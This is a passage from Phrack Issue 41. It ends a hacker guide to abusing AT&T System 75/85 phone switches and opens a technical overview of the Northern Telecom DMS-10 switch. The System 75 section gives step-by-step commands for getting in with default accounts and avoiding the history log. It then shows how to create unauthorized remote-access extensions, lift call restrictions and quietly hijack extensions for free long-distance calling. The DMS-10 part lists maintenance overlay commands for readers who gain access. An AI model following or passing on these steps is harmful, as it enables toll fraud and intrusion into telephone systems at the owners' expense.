  2816. 1983, AT&T came out with a revised model called 75.  This system was built to
  2817. hold more incoming lines and did not have as many errors as the earlier version
  2818. did.  The 1983 version was replaced with a version re-written in 1986.  Today,
  2819. the systems are referred to as G models.  System 75 is now called G1 and 85 is
  2820. called G2.  A new model is currently available and is called the Definity G3I
  2821. which is Generic 3 with an Intel chip, and Definity G3R which is Generic 3 with
  2822. a Risk chip.  There are 3 different versions to each model.  Version one is the
  2823. most common and it is an XE Single Carrier Unit.  The other two systems are 2
  2824. carriers.  A system will usually cost somewhere around 50 to 80 thousand
  2825. dollars.  You MIGHT come across a smaller version and it is called "Merlin
  2826. Legend."  This system will hold about 50-100 lines.  System 75 & 85 will hold
  2827. around 1000 lines.  System 75/85 are used by companies to house all of their
  2828. incoming lines, as well as to send their incoming lines to destinations set up
  2829. by the owners, whether it be Audix or any other setup.  There are many uses for
  2830. the system besides VMBs and PBXes.  System 75/85 has three main functions that
  2831. hackers are interested in. They are the capabilities of VMB, bridging, and of
  2832. course PBX exchanges.
  2833.  
  2834.  
  2835. Discovering the System
  2836. ~~~~~~~~~~~~~~~~~~~~~~
  2837. When you find a System 75, you will make a 1200/NONE connection (if HST used),
  2838. as most setups have a built in 1200 baud modem.  Normally, the controller
  2839. number will not be in the same prefix as the business or the PBX and the line
  2840. is actually owned by AT&T.  Try CNAing a System 75 line and it will tell you
  2841. that it is owned by AT&T.  Once you find a carrier, you will need to be able to
  2842. display ANSI or some equivalent type of terminal graphics.  Most are set to
  2843. N81, but some may be E71.  My suggestion is to use ToneLoc which is produced by
  2844. Mucho Maas and Minor Threat.  As you know, this program will scan for carriers
  2845. as well as tones.  This program can be found on just about every ELEET H/P BBS.
  2846.  
  2847.  
  2848. Getting into the System
  2849. ~~~~~~~~~~~~~~~~~~~~~~~
  2850. Getting into the system is the easy part if you have the defaults.  You must
  2851. find them on your own and you will find out that a lot of people are not
  2852. willing to trade for them.  There is one default that will enable you to snoop
  2853. around and tell whether or not they have a PBX, provided that they have not
  2854. changed the password or restricted the account.  This one default is usually a
  2855. fully operational account without the privileges of altering any data but I
  2856. have come across a couple of systems where it wouldn't do anything.  Using this
  2857. default account is a good way to start if you can find it.  It is also good to
  2858. use any time you call and don't plan on changing anything.  All actions by this
  2859. account are not kept in the system history file.  Now on to the good stuff!!
  2860.  
  2861.  
  2862. Abusing System 75
  2863. ~~~~~~~~~~~~~~~~~
  2864. After logging into a 75, there are several commands available depending on the
  2865. default you are using.  This part will be for the basics.  I will explain more
  2866. later for the more advanced people.
  2867.  
  2868. When you log in, you will have the commands LIST, DISPLAY, and a couple others
  2869. that don't matter.  These are the only ones that you will need with the
  2870. aforementioned default.  First type "DIS REM" (display remote access).  If
  2871. there is a PBX set up on the system, it will be shown on the extension line.
  2872. The barrier code is the code to the PBX. If "none" appears, there is no code
  2873. and it's just 9+1.  The extension line can either be 3 or 4 digits.  Usually,
  2874. if it's 3 digits, it is run off of AUDIX (AUDio Information eXchange) or they
  2875. are smart and are hiding the one digit!  Look at the dialplan and see if the
  2876. extensions are 3 or 4 digits.  If it tells you that the extensions are three
  2877. digits, chances are that it is somewhere in the AUDIX system.  If it's run off
  2878. of an AUDIX, look through all of the extensions by either list or display
  2879. 'extensions' until you find one that says something like "remote extension" or
  2880. something that looks different.  If the one digit is hidden, use ToneLoc and
  2881. scan for the digit needed.  Next, display the trunk groups.  This will tell you
  2882. the actual dial-up.  If you don't find it here, don't panic.  As you go through
  2883. the trunk groups, also look at the incoming destination as well as the night
  2884. destination.  If any of these show the remote extension here, there is your
  2885. PBX.  If not, keep looking through all of the trunk groups.  Write down all of
  2886. the phone numbers it gives you and try them.  They can usually be found on page
  2887. three or so.
  2888.  
  2889. A LOT of the time, places call forward a back line or so to the actual PBX.  If
  2890. there is no remote access extension when you display the remote access, you are
  2891. shit out of luck unless you have a higher default and read the rest of this
  2892. text.
  2893.  
  2894.  
  2895. Setting Up Your Own PBX
  2896. ~~~~~~~~~~~~~~~~~~~~~~~
  2897. If you have a higher default, you will notice that if you type help, you have
  2898. more commands that are available to you, such as change, download, etc.
  2899. Remember, the company can change the privileges of the defaults so if you
  2900. cannot see these commands, use another default.  The first thing you want to do
  2901. is to display the dialplan.  This will tell you the amount of digits and the
  2902. first digit of all of the sequences.  Here is an example of a dialplan.  There
  2903. are several ways the dialplan may look.
  2904.  
  2905.                  Number of Digits
  2906. -------1----2----3----4----5----6----7----8----9
  2907. --
  2908. F 1
  2909. I 2        Tac
  2910. R 3
  2911. S 4             Fac
  2912. T 5
  2913.   6               Extension
  2914. D 7               Extension
  2915. I 8        Tac
  2916. G 9
  2917. I 0 Attendant
  2918. T *
  2919.   #
  2920.  
  2921. Using the above chart, all extensions will start with either a 6 or 7 and will
  2922. be four digits long.  The Tac is two digits, and will start with a 2 or an 8.
  2923. Don't worry about FAC or any others at this time.
  2924.  
  2925. After you make note of this, type "ch rem" (change remote access), go to the
  2926. extension line, and put in an extension.  Next, find the trunk group that you
  2927. want to use and type "ch tru #".  Go to the line for night service and put the
  2928. extension in there.  If there is already an extension for night service on all
  2929. of the trunks, don't worry. If not, add it, and then save it.  If it says
  2930. invalid extension, you misread the dialplan.  If you pick an extension already
  2931. in use, it will tell you so when you try to install it in the remote extension
  2932. line in the remote address.  Once all of this is completed, you may go back to
  2933. the remote access and add a code if you like, or you may just enter "none" and
  2934. that will be accepted.  THE NEXT PART IS VERY IMPORTANT!  Look at the trunk
  2935. that you installed and write down the COR number.  Cancel that command and type
  2936. "dis cor #".  Make sure that the Facilities Restriction Level (FRL) at the top
  2937. is set to 7 (7 is the least restricted level & 0 is the most) and that under
  2938. calling party restrictions & called party restrictions, the word "none" (lower
  2939. case) is there!  If they are not, type "ch cor #" and make the changes.  Last,
  2940. type "dis feature".  This will display the feature access codes for the system.
  2941. There will be a line that says something like "SMDR Access Code."  This will be
  2942. the code that you enter after the barrier code if there is one.  I have seen
  2943. some be like *6, etc.  Also, there will be, on page 2 I believe, something to
  2944. the like of outside call. usually it is set to 9 but check to be sure.   That's
  2945. about it for this segment.  All should be fine at this point.  For those that
  2946. want a 24 hour PBX, this next section is for you.
  2947.  
  2948.  
  2949. For those of you that are greedy, and want a 24 hour PBX, most of the steps
  2950. above are the same.  The only difference is that you will look through all of
  2951. the trunks until you come across one that has several incoming rotary lines in
  2952. it.  Simply write down the port number and the phone number for future
  2953. reference and delete it by using the "ch" command.  From the main prompt, type
  2954. "add tru #".  For the TAC, enter a correct TAC number.  Keep going until you
  2955. get to the COR.  Enter a valid one and remember that the FRL should be set to
  2956. 7, etc.  Keep going...the next line that is vacant and needs something is the
  2957. incoming destination.  Set it to the remote extension that you have created.
  2958. The next vacant line I think is type (towards the middle of the page).  Enter
  2959. ground and it should print out "ground-start."  If there is a mistake, it will
  2960. not save and it will send you to the line that needs to have something on it.
  2961. After all is done, it will save.  After this segment, there is a copy of a
  2962. trunk and what it should look like for the use of a PBX.  Next, go to page 3
  2963. and enter the port and phone number that you wrote down earlier.  Save all of
  2964. the changes that you have made.  This should be all you need.
  2965.  
  2966.  
  2967. One more way!  If you scan through all of the extensions on the system, you may
  2968. find an "open" extension.  This extension may be like the phone outside in the
  2969. waiting room or an empty office or whatever.  This extension must be a valid
  2970. phone number on their network or must be reachable on their AUDIX for this
  2971. method to work. If you know how to add ports to Audix, this method will be best
  2972. for you since setting up a trunk is not needed.  If you find something like
  2973. this, it's usually better to use this as your 24 hour PBX rather than taking
  2974. away a line for several reasons:  1) there are less changes that you must make
  2975. so there will be less data saved in the history file; 2) other people that have
  2976. legal uses for the line won't trip out when they get a dial tone; and 3) the
  2977. company will not notice for some time that they've lost an extension that is
  2978. hardly used!  To set it up this way, you must delete the old info on that
  2979. extension by typing "remove extension #".  It will then show you the station in
  2980. detail.  Save it at that point and it will be deleted.  Next go to the remote
  2981. access and enter the extension that you deleted on the remote extension line.
  2982. Next enter a barrier code or "none" if you don't want one.  Save it!  Doing it
  2983. this way USUALLY does not require a new trunk to be added since the port is
  2984. already in the system but if you run into problems, go back and add it through
  2985. the use of a trunk.  You will still have to assign it a "cor" in the remote
  2986. access menu, and remember to make sure that the FRL and the restrictions are
  2987. set correctly as stated as above.
  2988.  
  2989.  
  2990. In part 2, if there is a demand, I will tell how to make a bridge off of a 75.
  2991. It is a lot more difficult, and requires a lot more reading of the manuals.  If
  2992. anyone can obtain the manuals, I would strongly urge them to do so.  Also
  2993. potentially in part 2, I will show how to create a VMB.  If they have AUDIX
  2994. voice mail, chances are they have a 75!
  2995.  
  2996. So happy hunting and see ya soon!
  2997.  
  2998. If you need to get a hold of me to ask a question, you may catch me on the nets
  2999. or on IRC.
  3000.  
  3001. Enjoy!
  3002.  
  3003. Scott Simpson
  3004.  
  3005. -------------------------------------------------------------------------------
  3006. APPENDIX A : Example of a Trunk For PBXs
  3007.  
  3008.                               Trunk Group                    Page 1 of 5
  3009.                               -----------
  3010.  
  3011. Group Number #               Group Type: co                Smdr Reports: n
  3012.  
  3013.    Group name: Whatever ya want         Cor: #            Tac: #
  3014.  
  3015. Mis Measured? n
  3016.  
  3017.    Dial access: y    Busy Threshold: 60      Night Service: What will answer
  3018.                                                             after hours
  3019.  
  3020. Queue length: 0  Abandoned call Search: n   Incoming Dest: What will answer
  3021.                                                            any time the # is
  3022.                                                            called unless NS
  3023.                                                            has an extension.
  3024.  
  3025.     Comm Type: voice       Auth Code: n     Digit Absorption List:
  3026.  
  3027.  
  3028.       Prefix-1? n    Restriction: code    Allowed Calls List: n
  3029.  
  3030.    Trunk-Type: Ground-start
  3031.  
  3032.  Outgoing Dial type: tone
  3033.  
  3034.   Trunk Termination: whatever it is        Disconnect Timing: Whatever it is
  3035.                      to.                                      set to.
  3036.                              ACA Assignments: n
  3037.  
  3038.  
  3039. [Page 2 is not all that important.  It's usually used for all of the
  3040. [maintenance to the trunk etc. so leave it all set to its default setting.]
  3041.  
  3042.  
  3043.                                                   page 3 of 5
  3044.        Port        Name        Mode      Type       Answer delay
  3045. 1   Port number  phone number
  3046. 2
  3047. 3
  3048. etc.
  3049.  
  3050.  
  3051. That's all that is needed for the trunks.
  3052. -------------------------------------------------------------------------------
  3053. APPENDIX B : Basic Commands and Terms
  3054.  
  3055.      Basic Terminology
  3056.      -----------------
  3057. COR  - Class Of Restriction
  3058. FRL  - Facilities Restriction Level
  3059. SMDR - Station Message Detail Recording
  3060. TAC  - Trunk Access Code
  3061. FAC  - Feature Access Code
  3062.  
  3063.  
  3064.      Basic Commands for Default Emulation (513)
  3065.      ------------------------------------------
  3066. Esc Ow - Cancel
  3067. Esc [U - Next Page
  3068. Esc SB - Save
  3069. Esc Om - Help
  3070.  
  3071.  
  3072.      Commands for 4410
  3073.      -----------------
  3074. Esc Op - Cancel
  3075. Esc Ot - Help
  3076. Esc Ov - Next Page
  3077. Esc Ow - Back Page
  3078. Esc OR - Save
  3079. Esc Oq - Refresh
  3080. Esc Os - Clear Fields
  3081.  
  3082. Below is an explanation of all of the commands.
  3083.  
  3084. The following is a captured buffer of a login to System 75.  I have captured
  3085. the commands and have edited the buffer to include brief definitions of the
  3086. commands.
  3087.  
  3088. Display and list are basically the same command, but display shows more
  3089. detailed information on the command that you select.  For example, "list tru"
  3090. will list all of the trunk groups in the system.  "dis tru" will ask for a
  3091. trunk number, and then display all of the information on that trunk.
  3092.  
  3093. CH Help
  3094. Please enter one of the following action command words:
  3095.  
  3096. add                      duplicate                save
  3097. change                   list                     set
  3098. clear                    monitor                  status
  3099. display                  remove
  3100.  
  3101.  
  3102. Or enter 'logoff' to logoff the system
  3103. Add       - Is pretty self-explanatory
  3104. Change    - Is also self-explanatory
  3105. Clear     - will clear out the segment
  3106. Duplicate - will duplicate the process
  3107. List      - self-explanatory
  3108. Monitor   - used for testing, and monitoring the system
  3109. Remove    - remove anything from the system EXCEPT the History File!  Sorry
  3110.             guys!
  3111. Save      - saves work done
  3112. Set       - sets the time, etc.
  3113. Status    - shows current status of the system
  3114.  
  3115. List Help
  3116. Please enter one of the following object command words:
  3117.                       COMMANDS UNDER "LIST"
  3118. abbreviated-dialing      groups-of-extension      personal-CO-line
  3119. aca-parameters           hunt-group               pickup-group
  3120. bridged-extensions       intercom-group           station
  3121. configuration            measurements             term-ext-group
  3122. coverage                 modem-pool               trunk-group
  3123. data-module              performance
  3124.  
  3125. Or press CANCEL to cancel the command
  3126. Abbreviated-Dialing: Speed calling feature from their voice terminal
  3127. Aca-parameters: Automatic-Circuit-Assurance
  3128. Bridged Extensions: Used for bridging extensions together
  3129. Configuration: Overall system Configuration
  3130. Coverage: Call Coverage
  3131. Data-module: Description of the data module used
  3132. Groups Of Extensions: Lists all of the extensions available
  3133. Hunt-Group: Checks for active or idle status of extension numbers
  3134. Intercom-group: Lists the intercoms and their info
  3135. Modem-Pool: Allows switched connects between data modules and analog data
  3136. Performance: Shows the performance of the system
  3137. Personal-CO-line: Is for dedicated trunks to or from public terminals
  3138. Pickup-group: Pickup station setup
  3139. Station: Will list all of the available stations assigned
  3140. Term-ext-group: For terminating extension group
  3141. Trunk-Group: Lists ALL of the trunks; will NOT show all details like Display
  3142.  
  3143. Dis Help
  3144. Please enter one of the following object command words:
  3145.                     Commands Under 'Display'
  3146. abbreviated-dialing      data-module              personal-CO-line
  3147. alarms                   dialplan                 pickup-group
  3148. allowed-calls            digit-absorption         port
  3149. announcements            ds1                      psc
  3150. attendant                errors                   remote-access
  3151. button-location-aca      feature-access-codes     route-pattern
  3152. circuit-packs            hunt-group               station
  3153. code-restriction         intercom-group           synchronization
  3154. communication-interface  ixc-codes                system-parameters
  3155. console-parameters       listed-directory-numbers term-ext-group
  3156. cor                      modem-pool               time
  3157. cos                      paging                   trunk-group
  3158. coverage                 permissions
  3159.  
  3160.  
  3161. Or press CANCEL to cancel the command
  3162. Abbreviated Dialing: Covered above, but shows more information
  3163. Alarms: Will show information on the alarms (which ones are on/off)
  3164. Allowed-Calls: Will show LD carrier codes and allowed call list
  3165. Announcements:
  3166. Attendant: Allows attendant to access trunks without voice terminals
  3167. Button-location-aca: Will show the location of the aca selected
  3168. circuit-packs: Tells types of lines used.
  3169. Code-Restriction: Shows restrictions for HNPA and FNPA
  3170. Communication-Interface: Information on the communication interface
  3171. Console-Parameters: Will list the parameters of the console, etc.
  3172. Cor: Class Of Restriction (will show the cor for the # entered)
  3173. Cos: Class Of Service
  3174. Coverage: Shows the coverage of the system (voice terminals, etc.)
  3175. Data-Module: Will show information for the data channels entered
  3176. Dialplan: List the current config for extensions etc.
  3177. Digit-absorption:
  3178. Ds1: Used for tie-trunk services
  3179. Errors: Shows all of the errors on the system
  3180. Feature-Access_Codes: Lists all of the feature access codes for all of the
  3181.                       features on the entire system
  3182. Hunt-Group: As above, but will tell more information for the # you enter
  3183. Intercom Group: Lists all of the names and their intercom assignments
  3184. IXC-Codes: Inter-eXchange Carrier codes
  3185. Listed-Directory: Lists the numbers in the directory of the system
  3186. Modem-Pool: Will show info on the channel you select (exp baud, parity, etc.)
  3187. Paging: Used for the paging stations on the voice terminals
  3188. Permissions: Will show the privileges of the other accounts/defaults
  3189. Personal-CO-Line: As above but more descriptive
  3190. Pickup-Group: Shows names and extensions in the specified group number
  3191. Port: Will show the info on the port you ask about
  3192. PSC: Keeps a call between to data points connected while the system is active
  3193. Remote-Access: Will show the Remote Access that is there (if any)
  3194. Route-Pattern: The pattern of routing within the voice terminals, etc.
  3195. Station: Will show detailed information on the station # you enter
  3196. Synchronization: Will show the location of the DS1 packs
  3197. System-Parameters: List of all of the available systems parameters
  3198. Term-Ext-Group: As above but more descriptive
  3199. Time: Will show the current time and date
  3200. Trunk-Group: Will show all available information for the trunk you select
  3201. _______________________________________________________________________________
  3202.                                 ==Phrack Inc.==
  3203.  
  3204.                    Volume Four, Issue Forty-One, File 7 of 13
  3205.  
  3206.                           How To Build A DMS-10 Switch
  3207.  
  3208.                                 by The Cavalier
  3209.                      Society for the Freedom of Information
  3210.  
  3211.                                  March 11, 1992
  3212.  
  3213.  
  3214.      With the telephone network's complexity growing exponentially as the
  3215. decades roll by, it is more important than ever for the telecom enthusiast to
  3216. understand the capabilities and function of a typical Central Office (CO)
  3217. switch.  This text file (condensed from several hundred pages of Northern
  3218. Telecom documentation) describes the features and workings of the Digital
  3219. Multiplex Switch (DMS)-10 digital network switch, and with more than an average
  3220. amount of imagination, you could possibly build your own.
  3221.  
  3222.      The DMS-10 switch is the "little brother" of the DMS-100 switch, and the
  3223. main difference between the two is the line capacity.  The DMS line is in
  3224. direct competition to AT&T's ESS line (for the experienced folks, the features
  3225. covered are the as those included in the NT Software Generic Release 405.20 for
  3226. the 400 Series DMS-10 switch).
  3227.  
  3228.  
  3229.  Table of Contents
  3230.  ~~~~~~~~~~~~~~~~~
  3231. I.   OVERVIEW/CPU HARDWARE SPECS
  3232. II.  NETWORK SPECS
  3233.      1. Network Hardware
  3234.      2. Network Software
  3235.      3. Advanced Network Services
  3236. III. EXTERNAL EQUIPMENT SPECS
  3237.      1. Billing Hardware
  3238.      2. Recorded Announcement Units
  3239.      3. Other Misc. Hardware
  3240. IV.  MAINTENANCE AND ADMINISTRATION
  3241.      1. OAM
  3242.      2. Interactive Overlay Software Guide
  3243. V.   SPEC SHEET
  3244. VI.  LIMITED GLOSSARY
  3245.  
  3246. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3247.  
  3248. I. OVERVIEW/CPU HARDWARE SPECS
  3249.  
  3250. Overview
  3251.  
  3252.      The DMS-10 switch is capable of handling up to 10,800 lines, and was
  3253. designed for suburban business centers, office parks, and rural areas.  It can
  3254. be installed into a cluster configuration to centralize maintenance and
  3255. administration procedures and to increase combined line capacity to 50,000
  3256. lines.  It is capable of functioning as an End Office (EO), an Equal Access End
  3257. Office (EAEO), and an Access Tandem (AT), and is a known as a Class 5 switch.
  3258. It supports up to 3,408 trunks and 16,000 directory numbers.  It can outpulse
  3259. in DP (Dial Pulse), MF (Multi-Frequency), or DTMF (Dual-Tone Multi-Frequency),
  3260. insuring compatibility with new and old switches alike (translation -- the
  3261. switch is small, by most standards, but it has massive bounce for the ounce).
  3262.  
  3263.  
  3264. Hardware Specifications
  3265.  
  3266.      The DMS-10 switch itself is a 680x0-based computer with 1 MB of RAM in its
  3267. default configuration.  The processor and memory are both duplicated; the
  3268. backup processor remains in warm standby.  The memory system is known as the
  3269. n+1 system, meaning that the memory is totally duplicated.
  3270.  
  3271.  
  3272. II. NETWORK SPECS
  3273.  
  3274. Network Hardware
  3275.  
  3276.      The DMS-10 network hardware consists mostly of PEs, or Peripheral
  3277. Equipment trunk and line packs.  The PEs take the incoming analog voice
  3278. signals, digitalize them into 8 bit PCM (Pulse Code Modulation) signals, and
  3279. feed it into the main transmission matrix section of the switch.  There, it is
  3280. routed to another trunk or line and converted back into an analog signal for
  3281. retransmission over the other side of the call.  Note that manipulating voice
  3282. in the digital domain allows the signal to be rerouted, monitored, or
  3283. retransmitted across the country without any reduction in signal quality as
  3284. long as the signals remain in PCM format.  <Hint!>
  3285.  
  3286.  
  3287. Network Software
  3288.  
  3289.      The DMS-10 has a variety of software available to meet many customers'
  3290. switching needs.  A good example of this software is the ability of several
  3291. DMS-10 switches to be set up in a cluster (or star configuration, for those of
  3292. you familiar with network topologies).  In this arrangement, one DMS-10 is set
  3293. up as the HSO (Host Switching Office) and up to 16 DMS-10s are set up as SSOs
  3294. (Satellite Switching Offices), allowing all billing, maintenance, and
  3295. administration to be handled from the HSO.  Additionally, all satellites can
  3296. function on their own if disconnected from the HSO.
  3297.  
  3298.      Another feature of the DMS-10's network software are nailed-up
  3299. connections, commonly known as loops.  The DMS-10 supports up to 48 loops
  3300. between any two points.  The connections are constantly monitored by the switch
  3301. computer, and if any are interrupted, they are re-established.
  3302.  
  3303.      Meridian Digital Centrex (MDC) is the name given to a group of features
  3304. that enable businesses to enjoy the benefits of having PBX (Private Branch
  3305. Exchange) equipment by simply making a phone call to the local telco.
  3306.  
  3307.  
  3308. Advanced Network Services (ANS)
  3309.  
  3310.      If the DMS-10 is upgraded with the 400E 32-bit RISC processor, the switch
  3311. will be able to handle 12,000 lines, enjoy a speed improvement of 80%, support
  3312. a six-fold increase in memory capacity, and, perhaps most importantly, will be
  3313. able to run NT's Advanced Network Services software.  This software includes
  3314. Common Channel Signaling 7 (CCS7), Advanced Meridian Digital Centrex, DMS
  3315. SuperNode connectivity, and ISDN.  CCS7 is the interswitch signaling protocol
  3316. for Signaling System 7, and the concept deserves another text file entirely
  3317. (see the New Fone eXpress/NFX articles on SS7).
  3318.  
  3319.  
  3320. III. EXTERNAL EQUIPMENT SPECS
  3321.  
  3322. Billing Format Specifications
  3323.  
  3324.      The DMS-10 can record AMA (Automatic Message Accounting) billing data in
  3325. either Bellcore or Northern Telecom format, and it can save this data in one of
  3326. several ways:
  3327.  
  3328.      - by saving onto a 9-track 800 BPI (Bits-Per-Inch) density tape drive
  3329.        called an MTU (Magnetic Tape Unit)
  3330.  
  3331.      - by saving onto a IOI (Input/Output Interface) pack with a 64 MB SCSI
  3332.        (Small Computer System Interface) hard drive, and transferring to 1600
  3333.        BPI tape drives for periodic transport to the RAO (Regional Accounting
  3334.        Office)
  3335.  
  3336.      - by transmitting the data through dial-up or dedicated telephone lines
  3337.        with the Cook BMC (Billing Media Converter) II, a hard drive system that
  3338.        will transmit the billing records on request directly to the RAO.  The
  3339.        Cook BMC II supports six different types of transmission formats, listed
  3340.        below:
  3341.  
  3342.         * AMATS (BOC)                           [max speed: 9600 bps]
  3343.             Call records are stored using the Bellcore AMA format and polled
  3344.             using the BX.25 protocol.  Two polling ports are provided with one
  3345.             functioning as a backup.
  3346.  
  3347.         * BIP Compatible                        [max speed: 9600 bps (2400*4)]
  3348.             Call records are stored using the Bellcore AMA format and polled
  3349.             using the HDLC Lap B protocol.  Four polling ports are provided
  3350.             that can function simultaneously for a combined throughput of 9600
  3351.             bps. This specification is compatible with GTE's Billing
  3352.             Intermediate Processor.
  3353.  
  3354.         * Bellcore AMA w/ BiSync polling        [max speed: 9600 bps]
  3355.             Call records are stored using the Bellcore AMA format and polled
  3356.             using the IBM BiSync 3780 protocol.  One polling port is provided.
  3357.             This option is intended for operating companies who use independent
  3358.             data centers or public domain protocols for data processing.
  3359.  
  3360.         * Bellcore AMA w/ HDLC polling          [max speed: 9600 bps]
  3361.             Call records are stored using the Bellcore AMA format and polled
  3362.             using the HDLC (High-level Data Link Control) protocol.  One port
  3363.             is provided.
  3364.  
  3365.         * NT AMA w/ HDLC polling                [max speed: 9600 bps]
  3366.             Call records are stored using the Northern Telecom AMA format and
  3367.             polled using the HDLC protocol.
  3368.  
  3369.         * NT AMA w/ BiSync polling              [max speed: 4800 bps]
  3370.             Call records are stored using the Northern Telecom AMA format and
  3371.             polled using the BiSync protocol.
  3372.  
  3373.      - by interfacing with AT&T's AMATS (Automatic Message Accounting
  3374.        Teleprocessing System)
  3375.  
  3376.      - by interfacing with the Telesciences PDU-20
  3377.  
  3378.      All of the above storage-based systems are fully fault-tolerant, and the
  3379. polled systems can store already-polled data for re-polling.
  3380.  
  3381.  
  3382. Recorded Announcement Units
  3383.  
  3384.      The DMS-10 system may be interfaced to one or more recorded announcement
  3385. units through two-wire E&M trunks.  Some units supported include the Northern
  3386. Telecom integrated Digital Recorded Announcement Printed Circuit Pack (DRA
  3387. PCP), the Cook Digital Announcer or the Audichron IIS System 2E.
  3388.  
  3389.      The DRA PCP is integrated with the DMS-10 system, as opposed to the Cook
  3390. and Audichron units, which are external to the switch itself.  It provides
  3391. recorded announcements on a plug-in basis and offers the following features:
  3392.  
  3393.      - Four ports for subscriber access to announcements
  3394.      - Immediate connection when pack is idle
  3395.      - Ringback tone when busy until a port is free
  3396.      - Switch-selectable message lengths (up to 16 seconds)
  3397.      - Local and remote access available for message recording
  3398.      - Memory can be optionally battery-backed in case of power loss
  3399.      - No MDF (Main Distribution Frame) wiring required
  3400.  
  3401. Other External Hardware
  3402.  
  3403.      The DMS-10 can also support the Tellabs 292 Emergency Reporting System,
  3404. the NT Model 3703 Local Test Cabinet, and the NT FMT-150 fiber optic
  3405. transmission system.  More on this stuff later, perhaps.
  3406.  
  3407.  
  3408. IV. MAINTENANCE AND ADMINISTRATION
  3409.  
  3410. OAM
  3411. ---
  3412.      OAM, or Operations, Administration, and Maintenance functions, are
  3413. performed through an on-site maintenance terminal or through a remote
  3414. maintenance dial-in connection.  The DMS-10 communicates at speeds ranging from
  3415. 110 to 9600 baud through the RS-232C port (standard) in ASCII.  There can be up
  3416. to 16 connections or terminals for maintenance, and security classes may be
  3417. assigned to different terminals, so that the terminal can only access the
  3418. programs that are necessary for that person's job.  The terminals are also
  3419. password protected, and bad password attempts result in denied access, user
  3420. castration and the detonation of three megatons of on-site TNT.  <Just kidding>
  3421.  
  3422.      The software model for the DMS-10 consists of a core program which loads
  3423. overlays for separate management functions.  These overlays can be one of two
  3424. types:  either free-running, which are roughly analogous to daemons on Unix
  3425. environments, which are scheduled automatically; or interactive, which
  3426. communicate directly with the terminal user.
  3427.  
  3428.      The major free-running programs are the Control Equipment Diagnostic
  3429. (CED), the Network Equipment Diagnostic (NED), the Peripheral Equipment
  3430. Diagnostic (PED), and the Digital Equipment Diagnostic (DED).  The CED runs
  3431. once every 24 hours, and tests the equipment associated with the CPU buses and
  3432. the backup CPU.  The NED runs whenever it feels like it and scans for faults in
  3433. the network and proceeds to deal with them, usually by switching to backup
  3434. hardware and initiating alarm sequences.  The PED is scheduled when the switch
  3435. is installed to run whenever the telco wants it to, and it systematically tests
  3436. every single trunk and line connected to that central office (CO).  The DED
  3437. tests the incoming line equipment that converts analog voice to digital PCM.
  3438.  
  3439.      Now, for interactive programs (a.k.a. interactive overlays), I'm going to
  3440. list all of their codes, just in case one of you gets lucky out there.  To
  3441. switch to an overlay, type OVLY <overlay>.  To switch to a sub-overlay, type
  3442. CHG <sub-overlay>.  Keep in mind that NT has also installed help systems on
  3443. some of their software, accessible by pressing "?" at prompts.  Here we go:
  3444.  
  3445. Overlay     Explanation and Prompting Sequences
  3446. -------     -----------------------------------
  3447. ALRM        Alarms
  3448.  
  3449.             ALPT - Alarm scan points
  3450.             SDPT - Signal distribution points
  3451.  
  3452. AMA         Automatic Message Accounting
  3453.  
  3454.             AMA  - Automatic Message Accounting
  3455.             MRTI - Message-rate treatment index
  3456.             PULS - Message-rate pulsing table
  3457.             TARE - Tariff table
  3458.  
  3459. AREA        Area
  3460.  
  3461.             CO   - Central Office Code
  3462.             HNPA - Home Numbering Plan Area
  3463.             RC   - Rate Center
  3464.             RTP  - Rate Treatment Package
  3465.  
  3466. CLI         Calling Line Identification
  3467.  
  3468. CNFG        Configuration Record
  3469.  
  3470.             ALRM - Alarm System Parameters
  3471.             AMA  - Automatic Message Accounting parameters
  3472.             BUFF - System Buffers
  3473.             CCS  - Custom Calling Services
  3474.             CCS7 - Common Channel Signaling No. 7
  3475.             CDIG - Circle Digit Translation
  3476.             CE   - Common Equipment Data
  3477.             CLUS - Cluster data
  3478.             COTM - Central Office overload call timing
  3479.             CP   - Call processing parameters
  3480.             CROT - Centralized Automatic Reporting of Trunks
  3481.             CRTM - Central Office regular call processing timing
  3482.             CSUS - Centralized Automatic Message Accounting suspension
  3483.             DLC  - Data Link Controller assignment for clusters
  3484.             E800 - Enhanced 800 Service
  3485.             FEAT - Features
  3486.             GCON - Generic Conditions
  3487.             HMCL - Host message class assignment
  3488.             IOI  - Secondary input/output interface pack(s)
  3489.             IOSF - Input/Output Shelf Assignment
  3490.             LCDR - Local Call Detail Recording
  3491.             LIT  - Line Insulation Testing parameters
  3492.             LOGU - Logical Units Assignments
  3493.             MOVE - Move Remote Line Concentrating Module
  3494.             MTCE - Maintenance Parameters
  3495.             MTU  - Magnetic Tape Unit Parameters
  3496.             OPSM - Operational Measurements
  3497.             OVLY - Overlay scheduling
  3498.             PSWD - Password Access
  3499.             SITE - Site assignments
  3500.             SSO  - Satellite Switching Office Assignments
  3501.             SUB  - Sub Switch
  3502.             SYS  - System parameters
  3503.             TRB  - Periodic trouble status reporting
  3504.             VERS - Version
  3505.  
  3506. CPK         Circuit Pack
  3507.  
  3508.             ACT  - AC Testing Definition
  3509.             DCM  - Digital Carrier Module
  3510.             LPK  - Line Concentrating Equipment line packs
  3511.             PACK - Peripheral Equipment packs
  3512.             PMS  - Peripheral Maintenance System pack
  3513.             PSHF - Peripheral Equipment Shelf
  3514.             RMM  - Remote Maintenance Module
  3515.             RMPK - Remote shelf
  3516.             RSHF - Remote Concentration Line Shelf
  3517.             SBLN - Standby line
  3518.             SLC  - SLC-96
  3519.             SLPK - SLC-96 pack
  3520.  
  3521. DN          Directory Number
  3522.  
  3523.             ACDN - Access Directory Number
  3524.             CRST - Specific Carrier Restricted
  3525.             ICP  - Intercept
  3526.             RCFA - Remote Call Forwarding appearance
  3527.             ROTL - Remote Office Test Line
  3528.             STN  - Station Definition
  3529.  
  3530. EQA         Equal Access
  3531.  
  3532.             CARR - Carrier Data Items
  3533.             CC   - Country Codes
  3534.  
  3535. HUNT        Hunting
  3536.  
  3537.             DNH  - Directory Number Hunting
  3538.             EBS  - Enhanced Business Services hunting
  3539.             KEY  - Stop hunt or random make busy hunting
  3540.  
  3541. LAN         Local Area Network
  3542.  
  3543.             LAC  - LAN Application Controller
  3544.             LCI  - LAN CPU Interface
  3545.             LSHF - Message LAN Shelf
  3546.  
  3547. NET         Network
  3548.  
  3549.             D1PK - DS-1 interface pack (SCM-10S)
  3550.             1FAC - Interface packs
  3551.             LCM  - Line Concentrating Module
  3552.             LCMC - Line Concentrating Controller Module
  3553.             NWPK - Network Packs
  3554.             RCT  - Remote Concentrator Terminal
  3555.             REM  - Remote Equipment Module
